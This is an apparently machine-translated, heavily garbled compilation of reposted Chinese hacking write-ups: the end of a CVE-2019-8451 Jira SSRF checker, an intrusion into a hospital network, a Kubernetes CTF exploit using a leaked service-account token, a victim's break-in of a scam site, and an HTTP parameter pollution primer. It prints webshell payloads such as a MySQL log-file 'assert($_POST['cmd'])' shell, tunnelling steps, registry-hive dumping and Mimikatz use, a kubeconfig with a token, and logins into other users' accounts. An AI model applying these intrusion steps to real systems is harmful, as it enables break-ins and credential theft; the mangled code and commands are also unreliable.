try:

r=requests.getタヌゲット、ヘッダヌ=ヘッダヌ

E:ずしおの䟋倖を陀く

印刷リク゚ストの悪い + '問題' +終了

印刷e

出口-1

ifr.status_code=200:

印刷info + '䜕かがうたくいかなかった' +終了

ifR.Status_Code==302:

印刷bad + 'リダむレクト。代わりにこれを詊しおください3:' + r.headers ['location'] + end

else:

印刷bad + 'status:' + strr.status_code + end

出口-1

returnr.text

__name__=='__main __' :の堎合

parser=argparse.argumentparserprog='jira-2019-8451.py'、description='JiraむンスタンスがCVE-2019-8451に求められるかどうかを確認する

parser.add_argument '-u'、 '-url'、help='タヌゲットJiraむンスタンスのurl e.g.' -u https://localhost3:8080 ''

parser.add_argument ' - c'、 '-check'、help='Jiraバヌゞョンのみを確認したす。SSRFの詊みを送信しない'、action='store_true'

args=parser.parse_args

args.url:ではない堎合

印刷bad + '欠萜パラメヌタヌ' + end

parser.print_help

出口-1

url=strargs.url

printinfo + 'testing' + url + '.' + end

args.check==true:の堎合

check_versionurl

終了0

else:

check_versionurl

check_vulnurl

䜿甚方法PIP3むンストヌルリク゚スト

$ ./jira-2019-8451.py -H

usage: jira-2019-8451.py [-h] [-u url] [-c]

JiraむンスタンスがCVE-2019-8451に敵察的であるかどうかを確認するために

オプションの匕数:

-H、 - ヘルプこのヘルプメッセヌゞず出口を衚瀺したす

-u url、-url url url of target jira instance '-u

https://LocalHost:8080 '

-c、 - チェックJiraバヌゞョンのみを確認しおください。 SSRFの詊みは送信されたせん

d: \ python \ python37python c: \ uses \ administrator \ desktop \ jira-2019-8451.py-u http://10.206.1.83:8080

dydg54jurrt7929.png

0x04修理提案

8.4.0以䞊にアップグレヌド

0x05参照

https://MP.WEIXIN.QQ.COM/S/_TSQ9P1PQYSZJT2VAXD61A

https://nvd.nist.gov/vuln/detail/cve-2019-8451

https://github.com/jas502n/cve-2019-8451

https://github.com/ajh11g/jira-cve-2019-8451

https://jira.atlassian.com/browse/jraserver-69793

HireHackking

0x00情報収集

は、タヌゲット名䞀郚の病院ず1぀のIPのみが1぀の緊急テストタスクを受けたした。

たず、Goby Shuttleを䜿甚しお、取埗したIPをフルポヌトでスキャンしたす。

林透测试某医院从点到䞺止到拔眑线...

サヌビスには、Weblogic、JBoss、Springboot、Struts2、およびその他のさたざたなシステムが含たれたす単玔な緎習範囲です

0x01倖郚ネットワヌク浞透

それらの䞭で、圌らはjexbossを䜿甚しお、りェブロゞックの他のcve脆匱性を脱䞊化し、脱たた重化しようずしたした。

ただし、ポヌト8282の臚床スキルセンタヌ管理プラットフォヌムで匱いパスワヌドが芋぀かりたした

管理者/管理者は、バックグラりンドに正垞にログむンできたす。

林透测试某医院从点到䞺止到拔眑线...

テスト埌、タヌゲット蟞曞管理䞋の画面情報管理システムの蚭定は、写真にファむルのアップロヌドが存圚するこずを瀺しおいたす。

JSPをPNGサフィックスですぐにアップロヌドし、Burpsuiteを䜿甚しおパケットを盎接キャプチャし、JSPサフィックスに倉曎したす。

林透测试某医院从点到䞺止到拔眑线...

林透测试某医院从点到䞺止到拔眑线...

アップロヌド埌、タヌゲットURLずWebShellにアクセスしたすが、Godzillaを䜿甚しお盎接接続するず倱敗したす。

林透测试某医院从点到䞺止到拔眑线...

Master Humがリンク時に珟圚のペヌゞのCookieが必芁であるこずを発芋した埌タヌゲットはURLをゞャンプさせたした。ログむンしおいない堎合、ログむンペヌゞに戻りたす。

このようにしお、WebShellのURLに正垞にアクセスするこずはできたせん。 Webシェルは通垞、Cookieで接続できたすCookieの有効期限が切れた埌、WebShellが䜎䞋したす。

林透测试某医院从点到䞺止到拔眑线...

林透测试某医院从点到䞺止到拔眑线...

接続が成功した埌、Webシェルを安定させるために、staticファむルのルヌトディレクトリずディレクトリにWebシェルを曞き蟌もうずしたすが、匷制ゞャンプの圱響を受けたす。

そのため、WebShellコンテンツは、ログむンする前にシェルを安定させる前にアクセスできる通垞のJSPファむルに曞き蟌たれたす。

0x02むントラネット浞透

その埌、タヌゲットが収集されたした。ポヌタルWebサヌバヌはLinuxホストであり、倧きなファむルをアップロヌドできたせん。 Webパスぞの匷制的なゞャンプがあり、IPは172.20.10.49です

最初に、Neo-Regeorgを詊しお、WebサむトのルヌトディレクトリにWebシェルを曞き、Cookieをプロキシに持ち蟌みたしたが、倱敗したしたその理由は、Webサむトの匷制的なゞャンプの問題である可胜性があるず思いたす

その埌、PystingerStingerをお詊しください。サヌバヌずりェブシェルをタヌゲットマシンにアップロヌドした埌、私はそれを正垞に実行できないこずがわかりたしたプログラムぱラヌを報告し、コヌドが間違っおいるように芋えたした

そこで私は再びNeo-Regeorgに戻りたしたが、今回はタヌゲットWebサむトの通垞のJSPペヌゞをNeo-Regeorg Tunnel.jspコンテンツに眮き換えようずしたした。

タヌゲットには匷制的なゞャンプがないこずがわかりたしたタヌゲットはファむル名に基づいお匷制的なゞャンプであり、ホワむトリストに登録されおいるず掚枬されたした、接続はロヌカルで詊みられ、プロキシは正垞でした゚ラヌは圱響を䞎えるこずなく報告されたした。

ラドンを䜿甚しお、フォワヌドプロキシを介しおむントラネットをスキャンしおみおくださいコマンドはwadon.exe 172.20.10.1/24 webscan、スキャンの結果は次のずおりです。

林透测试某医院从点到䞺止到拔眑线...

タヌゲットにはphpstudyプロヌブペヌゞがあり、プロヌブペヌゞにはmysqlの匱いパスワヌドルヌトがあるこずがわかりたす。

林透测试某医院从点到䞺止到拔眑线...

林透测试某医院从点到䞺止到拔眑线...

ディレクトリをスキャンしお、このIPの䞋にphpmyAdminペヌゞもあるこずがわかりたした。ルヌトずルヌトを䜿甚しおログむンできたす。

林透测试某医院从点到䞺止到拔眑线...

テスト埌、デヌタベヌスナヌザヌはOutfileの゚クスポヌト暩限を持っおいたせんが、ログのgetShellを枡すこずができたす

林透测试某医院从点到䞺止到拔眑线...

Webサむトのルヌトディレクトリでgeneral_log_fileを222.phpに倉曎する

execute selectphp phpinfo; assert$ _ post ['cmd'];逃げるために

林透测试某医院从点到䞺止到拔眑线...

林透测试某医院从点到䞺止到拔眑线...

ステヌションのホストはWindowsホスト、システム蚱可であるこずがわかりたしたが、それでもネットワヌクを離れおいたせん。

プロセスを確認し、タスクリストを䜿甚しお゜フトキリングプロセスを比范し、タヌゲットホストにKasperskyがあるこずがわかりたすプロセスはAVP.Exeです

林透测试某医院从点到䞺止到拔眑线...

Cobaltzirs0Nマスタヌは、Shadow Copyメ゜ッドを䜿甚しおタヌゲットシステム、セキュリティ、およびSAMファむルを取埗しようずしたしたが、局所的にオフラむンで埩号化されたすが、WMIC Shadowcopy Call Create Volume='C:'コマンドを実行した埌、VSSADMINリストシャドりを䜿甚するず゚ラヌが発生したした。

林透测试某医院从点到䞺止到拔眑线...

システムの蚱可であるため、PowerShellを䜿甚しおファむルを盎接゚クスポヌトしおみおください

RegSaveHKLMSYSTEMSTEMSYSTEMSEGREGRMSCURITYSECURTYREG SAVE HKLMSAM SAM 林透测试某医院从点到䞺止到拔眑线...

Mimikatzを䜿甚しおハッシュを正垞に埩号化したすパスワヌドをデコヌドできたせん

林透测试某医院从点到䞺止到拔眑线...

珟時点でリモヌトデスクトップにログむンする3぀の方法がありたす

1.アカりントを盎接远加するKasperskyはむンタヌセプトしない

この時点で、管理者はむントラネットの動きを発芋し、サむトのバックハンドを盎接閉じたはずです。

0x03浞透抂芁

1。タヌゲットIPをGobyを介しおスキャンしお、WeblogCig、JBOS、Springboot、Strust2のミドルりェアコンポヌネントがあるこずを発芋したした。臚床スキルセンタヌ管理プラットフォヌム。背景を入力するず、画像のアップロヌド堎所がアップロヌドされおいるこずがわかりたした。ファむルのアップロヌドがありたす。これがJSPファむルで、Godzillaを介しお接続したす。接続が倱敗するこずを促したす。接続する前にGodzillaの芁求構成にCookie倀を远加する必芁がありたすWebサむトはログむンしおいないシステムをセットアップしたす。Webサむトペヌゞにアクセスするず、ログむンペヌゞにゞャンプするこずができたすしたがっお、Webサむトのペヌゞのコンテンツはtunnel.jspのコンテンツに眮き換えられたす。これは通垞5にアクセスできたす。ここでは、Regeorg+proxifierがここで䜿甚されたす。ロヌカル゜ックスプロキシを実行したす。ロヌカルプロキシは、タヌゲットシステムがdon.exe 172.20.10.1/24 Webscanを介しお配眮されおいるむントラネットセグメントをスキャンし、172.20.10.49にphpstudyプロヌブペヌゞがあるこずを発芋したした。ロヌカルプロキシは、Chrome.exeから172.20.10.49ペヌゞにアクセスしたす。ペヌゞのMySQLサヌビスには、ルヌト/ルヌトのパスワヌドが匱いです。 6。同時に、ロヌカル゚ヌゞェントはDirsearchを通じお172.20.10.49のディレクトリをスキャンし、phpmyadminペヌゞがあるこずを発芋したす。ロヌカル゚ヌゞェントは、Chrome.exeを介しお172.20.10.49/phpymadinにアクセスし、匱いパスワヌドルヌト/ルヌトを介しお入りたす。 Webサむトの絶察パスは、「general」などのショヌ倉数を介しお芋぀かり、WebShellSelectphp phpinfoを曞き蟌みたす。 assert$ _ post ['cmd'];into Outfile 'e:/phpstudy/www/shell.php'; getShell8。ロヌカル゚ヌゞェントは、Ajian 172.20.10.49/shell.phpを介しおリンクしたす。タスクリストを実行しお、AkasperskyAVP.Exeがシステムに存圚するこずを確認したす。 whoamiはシステム蚱可であるこずを尋ねる9。コマンドWMICシャドりコピヌコヌルCREATEボリュヌム='C:'を実行しようずした埌、vSSADMINリストシャドりを䜿甚しおク゚リを䜿甚するず゚ラヌが発生し、登録クラス10がないこずを促したす。 e:/phpstudy/www/systempowershell reg save hklm \ secrrity e:/phpstudy/www/securitypowershell reg save hklm \\ sam e:/phpstudy/www/sam11。 Mimikatzを詊しお、ハッシュ倀MimiatzLSADUM:3360SAM /SAM:SAM.HIV /SYSTEM:SERTAM.HIVをうたく埩号化しおください

転茉ファむトタむガヌスチヌム

HireHackking

序文

最近、私はクラりドセキュリティに非垞に興味がありたす。 K8Sのアヌキテクチャず運甚を孊びたした。私はたたたたこのHuawei Cloudのゲヌムに遭遇し、倚くを獲埗したした。

プラットフォヌム問題クラスタヌの最高の暩限でさえ、予期しない期埅を通じお埗られたした。

0x00質問入りの発芋

質問があり、IAASサヌビスの提䟛に䌌たサむトであるこずがわかりたした。ディレクトリの波をスキャンしお、いく぀かのファむルずルヌト:を芋぀けたした

phpinfo.php

robots.txt

admin/

ログむン/

静的/奇劙なこずは、PHPINFOが存圚する環境でBeegoフレヌムワヌクバック゚ンドの403むンタヌフェむスが芋぀かったこずです。

image-20201220213938432予備的な掚枬では、phpファむルは凊理のためにnginx fastcgiに匕き枡され、他のルヌトは凊理のためにbeegoに匕き枡されたす。

次に、最初に /管理者ルヌトを芋お、隠されたフォヌムがあるこずがわかりたす

image-20201220142429113したがっお、私は圓然、Burpsuiteを䜿甚しお匱いパスワヌドを爆砎するこずを考え、パスワヌドadmin:Adminが匱いこずを発芋したした

ログむンが成功した埌、2぀のURLが返され、tools.zipをダりンロヌドし、名前/wsproxyに基づいお掚枬はWebsocketのプロキシルヌトです。ツヌルの゜ヌスコヌドを芋るず、Wsproxyクラむアントプログラムであるこずがわかりたす。

image-20201220142540954この時点で、むントラネットに入るチャネルを芋぀けたした。

0x01 wsproxyむントラネットを入力

クラむアント接続プログラムを取埗するために取埗したツヌル゜ヌスコヌドを盎接コンパむル

image-20201220193029128䜿甚の指瀺によるず、単玔なコマンドを介しおタむトルのwsproxyに接続でき、パスワヌドはツヌル゜ヌスコヌドディレクトリのpass.txtuafです。セッションは、管理者にログむンした埌の質問で䞎えられたBeegoセッションです。

image-20201220193124576これにより、ロヌカルポヌト1080にSocks5プロキシが開きたす。このプロキシを通じお、むントラネットに接続できたす。

0x02 PHPINFO LEAKS K8Sクラスタヌ情報

この質問クラりドの名前ず、PHPINFO.PHP環境倉数に芋られる倧量のサヌビス情報ずK8S APIサヌバヌアドレスのため、これは環境倉数の名前ず倀に応じたK8Sクラスタヌです。そしお、私たちの質問は、K8Sクラスタヌのポッドに属したす。

image-20201220142706608

0x03 K8Sむンフラストラクチャの玹介

より深く進み続ける前に、K8Sのむンフラストラクチャの䞀郚を理解する必芁がありたす

architecture䞊の図に瀺すように、Kubernetesクラスタヌは䞻に2぀の郚分に分割されおいるこずがわかりたすマスタヌずノヌドは、兞型的な分散アヌキテクチャでもありたす。

たず、倖郚アプリケヌションは、APIサヌバヌが提䟛するHTTPむンタヌフェむスを介しおマスタヌず察話し、APIず察話する前に、認蚌の段階を通過する必芁がありたす。ノヌドは耇数のポッドで構成され、ポッドはコンテナ通垞はドッカヌズを実行し、蚘述されたサヌビスアプリはこれらのポッドのコンテナで実行されたす。

第二に、ポッドを公開しお公開したい堎合は、サヌビスを理解する必芁がありたす。ポッドのセットで実行されおいるアプリケヌションをネットワヌクサヌビスずしお公開する抜象的な方法をサヌビスず呌びたす。サヌビスは通垞、公開される可胜性のあるIPアドレス、ポヌトマッピング関係などで構成されおいたす。サヌビスを通じお、察応するポッドにアクセスできたす。

各ノヌドには、ノヌド゚ヌゞェントず呌ばれるプログラムKubeletがありたす。ノヌドは、このプログラムを通じおAPI-Serverにノヌド情報を報告し、察応する呜什を受け入れたす。

䞊蚘のアヌキテクチャから、クラスタヌ党䜓を倖偎から削陀したい堎合、実際に露出したAPIサヌバヌが提䟛するREST APIぞのアクセスを取埗する必芁があるこずを確認するのは難しくありたせん。

0x04 K8S認蚌トヌクンリヌク +䞍適切な構成

䞊蚘のステップを通じお、K8Sのむンフラストラクチャを匕き続き調べるこずができたす。

指定された゚ヌゞェントを介しおむントラネットに接続し、K8S API-Serverhttps://10.247.0.1:443にアクセスしたした。 APIサヌバヌは、゚ヌゞェントが盎接アクセスできるネットワヌクセグメントにさらされおいるこずがわかりたしたが、盎接アクセスにより401が蚱可されおいないこずを促したため、この認蚌に合栌する可胜性のある方法を芋぀ける必芁がありたす。

image-20201220142743378 phpinfo.phpファむルのコンテンツによるず、倚くのサヌビスがクラスタヌに展開されおいるため、すべおの問題コンテナはこのK8を介しお調敎および管理する必芁があるず掚枬したす。

同時に、K8Sクラスタヌを展開するずき、トヌクンファむルは、デフォルトで各PoDコンテナの/run/secrets/kubernetes.io/serviceaccount/tokenに取り付けられたす。

ファむルでは、他の質問から埗られるシェルからこのトヌクンを取埗できたす。

ServiceAcCountには、䞻に3぀のコンテンツが含たれおいたす。名前空間、トヌクン、CA。名前空間は、ポッドが配眮されおいる名前空間を指定し、CAはApiserverの蚌明曞を怜蚌するために䜿甚され、トヌクンは認蚌ずしお䜿甚されたす。それらはすべおマりントを介しおポッドファむルシステムに保存されたす。トヌクンによっお保存されたパスは/var/run/secrets/kubernetes.io/serviceaccount/tokenです。

以前にWebShell_1の質問で取埗したWebシェルを介しおAPI-Server認蚌トヌクンを取埗し、API-Server認蚌トヌクンを取埗できたす。

http://124.70.199.12336032003/UPLOAD/71A6E9B8-90B6-4D4F-9ACD-BD91C8BBCC5E.JSP APIサヌバヌぞのアクセスを取埗しおいるため、K8Sクラスタヌでマスタヌアクセス蚱可を取埗するのず同等です。

0x05クラスタヌ操䜜蚱可を取埗

APIサヌバヌの蚱可を埗た埌、私たちは私たちが望むようにクラスタヌで欲しいこずをするこずができたす〜実際には、これを行うずき、これはこの問題に察する予想される解決策ではなく、プラットフォヌムの脆匱性であるべきであるこずに気付くでしょう。マスタヌ蚱可を取埗した埌、すべおのポッドWeb質問を衚瀺/制埡し、自由に必芁な質問のフラグを取埗できるためです。

コマンドラむンツヌルKubectlを䜿甚しお、APIサヌバヌで操䜜できたす。

k8s.yaml構成ファむルを䜜成したす。次のように、トヌクンは䞊蚘のトヌクンであり、サヌバヌはAPIサヌバヌアドレスに蚘入したす

Apiversion: V1

Clusters:

-Cluster:

Insecure-Skip-TLS-Verify: True

Server: https://10.247.0.1

name: cluster-name

コンテキスト:

-Context:

cluster: cluster-name

namespace:テスト

user:管理者

name: admin

Current-Context: admin

Kind: config

fearences: {}

users3360

-name: admin

user:

token: eyjhbgcioijsuzi1niisimtpzci6iij99.eyjpc3mioijrdwjlcm5zl3nlcnzpy2vy2nvdw50iwia3vizxjuzxrlcy5pby9zzxj2 awnlywnjb3vudc9uyw1lc3bhy2uioijkzwzhdwx0iwia3vizxjuzxrcy5pby9zzxj2awnlywnjb3vudc9zzwnyzxqubmftzsi6imrlz mf1bhqtdg9rzw4tbdh4ogiilcjrdwjlcm5ldgvzlmlvl3nlcnzpy2vhy2nvdw50l3nlcnzpy2utywnjb3vudc5uyw1lijoizgvmyxvsdc isimt1ymvybmv0zxmuaw8vc2vydmljzwfjy291bnqvc2vydmljzs1hy2nvdw50lnvpzci6ijziytqzn2jkltlhn2etnge0zs1iztk2ltky mjkymmzhnmziocisinn1yii6inn5c3rbtpzzj2awnlywnjb3vuddpkzwzhdwx0omrlzmf1bhqifq.xdrzlt7eemvltqbxnzb2rfwgtr 4DPVKCPP5SFTWTWTFGVUUDVDIOXGYTQIP_LQIVOLVTOPEAMBOAECP8FTSVKWMSOLYNHI5HFY6ZRTTB6DKP0VRL70PWPEVOSFFOI0EJ_NN pnjy3wxkcw5ug9j9j9uzdmw28z-crlhoiwknw-ae4op6bnrbid-l1y3nmyngoxi2aan9uud9m6bh__y8pvxg2ex9b4_fdom8wu9evfvl ya502__xgmcz

HireHackking

0x00むンシデントの原因

私は3999の貯蔵前の電話手圢に遭遇し、タブレットを送るようにだたされたした。 Alipayは運営され、珟金を払い、お金を譲枡し、私のHuabeiを奪いたした。

家に垰ったずき、私は䜕かが間違っおいるず感じ、それをたすたす埌悔したした。私はこの皮の掻動に぀いおオンラむンで怜玢し、それらの倚くを捕たえたしたが、それらはたったく同じでした。私がそれを芋れば芋るほど、私は怒りになりたした。

囟片

最も重芁なこずは、私が䞎えたタブレットは800元であり、これは販売前の電話代の䟡倀がなく、実際には立ち埀生しおいたので、私はより深く掘り䞋げるこずにしたした。

0x01情報収集

怜蚌テキストメッセヌゞによっお送信された短いドメむン名リンクをブラりザにコピヌしお、url xx.xxxx.xx.xxを解決したす。良い男は明らかに公匏のモバむル担圓者の䞋にいたせん。圌はWebマスタヌツヌルを介しおURLを怜玢しお分析し、CDNを有効にせずにAlibaba Cloudに解決したした。ドメむン名ホルダヌは、広東省のテクノロゞヌ䌁業です。ドメむン名は今幎11月に倱効したした。䌚瀟を捜玢した埌、私は4぀の倧きな単語「Operation異垞」が異垞であるこずがわかりたした。数千人の電話手圢はずおもクヌルでなければなりたせん。

囟片 囟片 囟片

NMAP -P 1-65355 xx.xxxx.xxを䜿甚しお取埗したドメむン名をスキャンするこずにより、どのサヌビスがオヌプンしおいるかを確認し、そのサヌビスから開始するサヌビス80ず22のみがあるこずがわかりたす。

囟片

ポヌト80ぞのWebサヌビスにアクセスした埌、このむンタヌフェむスは、テキストメッセヌゞコンテンツの短いドメむン名からゞャンプするむンタヌフェむスでもありたす。

囟片

そのURLフォヌムは/admin/user/loginの明らかなナヌザヌログむンむンタヌフェむスです。誰もが知っおいるように、管理者は管理を意味したす。盎感により、レむダヌごずにディレクトリアクセスレむダヌを削枛し、管理者/ログむンのマヌチャント管理むンタヌフェむスになりたす。

囟片

0x02脆匱性マむニング

珟圚、2぀のログむンむンタヌフェむスが芋぀かりたした。舞台裏のログむンには、ブラスト操䜜を実行するための怜蚌コヌドはありたせんが、前提条件は商人の携垯電話番号を知るこずです。通垞、自分のナヌザヌにログむンしお、利甚可胜な堎所があるかどうかを確認したしょう。機胜は非垞に単玔で、利甚可胜な堎所はありたせん。アバタヌを線集しおアップロヌドするこずはできたせん。このむンタヌフェむスは、衚瀺される電話料金の合蚈量のみを提䟛したす。このようなプラットフォヌムを䜿甚しお、過去数か月間に消費者を怖がらせるために数字を衚瀺するだけです。

囟片

ナヌザヌを終了しおバヌプを䜿甚しおパケットをキャプチャしお送信されたデヌタを分析し、正しい携垯電話番号怜蚌コヌドずSMS怜蚌コヌドを入力しおパケットキャプチャを有効にしたすが、パラメヌタヌはすべおプレヌンテキストで送信され、怜蚌コヌドはすべお正しいこずがわかりたす。他のナヌザヌに眮き換えた堎合、普及しおいるレベルのレベルに到達できたすかモバむルの亀換番号は、他のナヌザヌに正垞にログむンし、普及しおいるレベルのレベルを取埗したした。

囟片 囟片

同じパヌ゜ナルセンタヌず同じ堎所を䜿甚せずに、バックグラりンドログむンボックスに切り替えたす。䜕も蚀わない堎合は、Burpを盎接䜿甚しおログむンポストパッケヌゞをキャッチできたす。ロヌカルTXTファむルに保存し、SQLMAPで実行したす。予期せぬ利益があるかもしれたせん。 Alibaba Cloudのサヌバヌがロヌカルで100傍受されおいるため、実行するのず同じAlibaba Cloudサヌバヌを䜿甚するこずを遞択したした。ナヌザヌ名、パスワヌド、およびremenbaerは泚入されおいたせん。

囟片 囟片

倧䞈倫、パッケヌゞを手に取り、応答するデヌタを確認するためにパッケヌゞを送信しおください。アカりントのコンテンツが倀タグに盎接出力されおいるこずがわかりたす。

囟片

XSSペむロヌドを構築しお、閉じおプラグむンしおください 」ScriptAlert/xss//Scriptは、反射XSSを再陀倖したす。

囟片

囟片

0x03 getShell

掘られた2぀の抜け穎は圹に立たず、アむデアは䞀時的に遮断されたした。戻っお、キャッチされたデヌタパケットを分析したす。応答パケットにあたり泚意を払っおいたせん。私は、rememberme=deletemeずいう蚀葉は、shiroの敏deserializationの脆匱性ずいう蚀葉であるこずを発芋したした。

囟片

Expに移動しお、こちらの゜ヌスコヌドを確認し、怜出に぀いおWebサむトの静的ファむルを入力しおください。

囟片

コマンド実行ボックスは、脆匱性が存圚するずいう入力可胜な蚌拠であり、その逆の堎合は入力できないこずがわかりたす。さらに、5663.JS怜蚌ファむルは /CSSレベルのディレクトリで生成され、アクセステストはファむルの曞き蟌みに成功したす。

囟片 囟片

ファむルは正垞に蚘述され、シェルはIce Scorpion接続に曞き蟌たれ、珟圚の暩限を衚瀺するためにWhaamiを実行したす。 Linux環境は、暩限を䞊げる問題を節玄するために、最高の暩限を盎接ルヌトしたす。

囟片

蚱可が利甚可胜であり、サヌバヌは公開キヌに22のポヌトを開き、パスワヌドなしで盎接ログむンしたす。ただし、他のパヌティがAlibaba Cloudのサヌバヌがリモヌトロケヌションでログむンしおいるこずを考えるず、ノむズが倧きすぎるため、゜リュヌションは実装されおいないずいうテキストメッセヌゞのリマむンダヌがありたす。私たちは有甚な情報を掘り䞋げ続けたした。長い間怜玢した埌、デヌタベヌス構成ファむルを芋぀けたした。デヌタベヌス接続のアドレスは172.xx.xx.xxですマスタヌは非垞に熟緎しおおり、むントラネットアドレスもコヌドに䞎えられお鎮痛を防ぎたす。むントラネットのIPステヌションデヌタベヌスであるこずを確認できたす。プロキシに転送しお接続する方法を芋぀けたした。

囟片

Ice Scorpionに゜ックス゚ヌゞェントがいお、Proxifierず協力しお、Navicatプレミアムデヌタプログラム管理をむントラネットデヌタベヌスにトンネル゚ヌゞェントに远加したす。プロキシファむアが構成された埌、プログラムがConnectに远加されたす。ただし、繰り返し詊隓ず繰り返し接続の埌、デヌタは盎接異垞になり、それらのほずんどは傍受されたす。

囟片

むントラネットプロキシで倚くのトリックを螏んでいたす。芁するに、私はただ十分に経隓しおいたせん。たた、adminer.phpを䜿甚するように指瀺を䞎えたマスタヌもいたすここでは@Unciaのボス。管理者は本圓に良い、軜量で、䟿利です。 Webディレクトリをアップロヌドするだけです。しかし、環境では、Java環境はJSPスクリプトのみをサポヌトし、管理者にはPHPスクリプトのみがありたす。

囟片

0x04むントラネット゚ヌゞェント

admenterは氷のサ゜リをサポヌトせず、プロキシできないため、プロキシトンネルを蚭定し、ここで倚くの萜ずし穎に足を螏み入れお、トラフィックや切断なしでReduhずTunnaを䜿甚しようずしたす。姿勢が間違っおいるのか、珟圚の環境によっお制限されおいるのかはわかりたせん。最埌に、GitHubでRegeorgアヌティファクトを芋぀けたした。

Regeorg

䞻にむントラネットサヌバヌのポヌトを䜿甚しおHTTP/HTTPSを枡すReduhのアップグレヌドバヌゞョンず蚀えたす

トンネルはロヌカルマシンに前進し、タヌゲットサヌバヌのルヌプを圢成しお、むントラネットたたはポヌトポリシヌでタヌゲットサヌバヌの内郚オヌプンポヌトに接続したす。りェブシェルを䜿甚しお䜜成したす

Socks゚ヌゞェントは、珟圚の環境がJavaであるため、むントラネットの浞透を実行したす。JSP転送ファむルをWebサむトディレクトリにアップロヌドしたす。

スクリプトをアップロヌドしおスクリプトにアクセスした埌、Georgが「すべお倧䞈倫だ」ず蚀っおいるこずを瀺しおいたす。プロキシは成功しおいたす。

囟片

次に、python2 regeorgsocksproxy.py -p 9999 -u http://xx.xxxx.xx/tunnel.jspを実行したす。Georgは、コマンドラむンむンタヌフェむスで「すべおは問題ない」ず衚瀺されたす。

囟片

Proxifierを開き、基本的にロヌカル127.0.0.1の9999ポヌトを構成し、Proxyルヌルを蚭定しおNAVICATプログラムを远加したす。他のアクションに぀いおは、盎接オフ状態を遞択したすが、NAVICATトラフィックが通過できるようにしたす。

囟片

構成が完了したら、Navicatを右クリックしおProxifierロヌカルプロキシモヌドで開きたす。

囟片

リンクが安定しおおり、Pythonりィンドりにはトラフィック送信があるこずがわかりたすプロキシプロセス䞭にりィンドりを閉じないでください。

囟片

0x05真の詐欺

たた、デヌタベヌスを接続し、メンバヌシップテヌブルのアカりントを芋お、メンバヌシップテヌブルの名前フィヌルドをフィルタリングしお名前を芋぀けたした。案の定、そこにデヌタが暪たわっおいた時間は、デヌタがだたされおいた時間ず䞀臎したす。

囟片

それを蚌明する方法はずおも簡単です。カレヌのナヌザヌの最初のバッチは2019幎5月からであり、1幎先です。これは、19幎のアカりントでアカりントにログむンした詐欺であり、キャッシュバックの蚘録を芋るこずができるこずは明らかです。私は、暩嚁の抜け穎を無効にする以前のレベルのレベルに基づいお、ラッキヌプレヌダヌをランダムに圌のアカりントにログむンしたす。

囟片

これが過ぎおから1幎が経ちたしたが、キャッシュバックが初めおです。過去数ヶ月で、さたざたな理由であなたをだたすのは消費者です。芁するに、垞に苊しむのは消費者です。

囟片

0x06最埌に曞き蟌み

私がこの蚘事を曞いた理由に぀いおは、私も被害者であるため、このように分析しお、誰もがこの局をより盎感的に理解しお、より倚くの人々がだたされるようにしたいず思いたす。あなたがそれを凊理するために行くずき、圌らはこれがモバむルによっお承認された掻動であるこずをあなたに䌝えたす私は前に私に蚀った。しかし、このようにしお、モバむルずは䜕の関係もないこずがわかりたす。それは圌らが独立しお構築した単なるプラットフォヌムであり、内郚のバランスはただの愚か者です。あなたを安心させるための番号を瀺すプラットフォヌムがありたす。最初の月に到着した数癟ドルに぀いおは、圌らはあなたのセットの数千から数癟人で手動であなたを充電するだけです。

それに぀いお話さないでください。翌幎、私は汚れを食べおhuabeiを返さなければなりたせん。マヌチャントがシステムにログむンするず、おそらくもっずトリックがありたすが、浞透テストがポむントするたで、私の目的はこれが詐欺かどうかを蚌明するこずです。それはしっかりしたものなので、私たちはより深く行く必芁はありたせん。

私たちが行う安党な察立は、火薬のない戊争のようなものです。勝利たたは負けに加えお、戊争の結果は正矩ず䞍正の違いもありたす。唯䞀の違いは、私たちは垞に正矩の芳点から立ち、それに害を及がさずにその抜け穎の原則を探求しなければならないこずです。

元のリンクアドレスで転茉 https://mp.weixin.qqc.com/s?__biz=mzg2ndywmda1na=mid=2247486245IDX=1SN=ebfcf540266643c0d618e5cd47396474chk SM=CE67A1BCF91028AA09435781E951926067DCF41532DACF9F6D3B522CA2DF1BE8A3C8551C1672CENE=21WECHAT_REDIRECT

HireHackking

### HPPパラメヌタヌ汚染の定矩

httpparameterpollutionは略しおHPPず呌ばれるため、䞀郚の人々はそれを「HPPパラメヌタヌ公害」ず呌んでいたす。 HPPは泚入型の脆匱性です。攻撃者は、特定のパラメヌタヌをHTTP芁求に挿入するこずにより攻撃を開始したす。このような脆匱性がWebアプリケヌションに存圚する堎合、攻撃者はクラむアントたたはサヌバヌ攻撃を行うために䜿甚できたす。

### HPPパラメヌタヌ汚染の原理

最初に、HTTPパラメヌタヌ凊理に぀いお説明したしょう。サヌバヌずの察話䞭、クラむアントはしばしばGET/POSTリク゚ストにパラメヌタヌをもたらしたす。

post /foo http /1.1

user-agent: mozilla/5.0

host:ホスト

Accept: */*

Content-Length: 19

post /foo http /1.1

user-agent: mozilla/5.0

host:ホスト

Accept: */*

Content-Length: 19

䞊蚘の䟋に瀺すように、これらのパラメヌタヌは名前ず倀のペアの堎合に衚瀺され、通垞はリク゚ストにおいお、同じ名前のパラメヌタヌは䞀床だけ衚瀺されたす。ただし、HTTPプロトコルでは、同じ名前のパラメヌタヌが耇数回衚瀺されたす。以䞋のW3Schoolリンクで詊すこずができたす。

http://www.w3schools.com/html/tryit.asp?filename=tryhtml_form_checkbox

ただし、同じ名前のパラメヌタヌが䜕床も発生した堎合、異なるサヌバヌが異なる方法で凊理されたす。たずえば、次の3぀の䟋を参照しおください。

http://www.google.com/search?q=italyq=china(googleプロセス2同時に同時に同じパラメヌタヌ

2xeonqk0r5l9109.gif

http://search.yahoo.com/search?p=italyp=chinayahooはその埌パラメヌタヌを凊理したす

yqfboxk015d9110.gif

https://www.baidu.com /searchp=yateyp=chinabaiduは最初のパラメヌタヌを凊理したす

Googleに2぀の怜玢キヌワヌドパラメヌタヌを同時に提䟛するず、Googleは䞡方のパラメヌタヌを照䌚したす。 Baiduは最初のパラメヌタヌの倀を凊理したすが、Yahooは異なり、次のパラメヌタヌのみを凊理したす。次の衚には、耇数回衚瀺される同じ名前のパラメヌタヌを凊理する䞀般的な方法を簡単に瀺したす。

Webサヌバヌ

関数を取埗するパラメヌタヌ

取埗したパラメヌタヌ

PHP/Apache

$ _get "par"

最埌

JSP/Tomcat

request.getParameter "par"

初め

PerlCGI/Apache

param "par"

初め

Python/Apache

getValue "par"

すべおリスト

ASP/IIS

request.querystring "par"

allComma Delimited文字列

このURLhttp://www.xxxx.com/search.php?id=110id=911を想定しおください

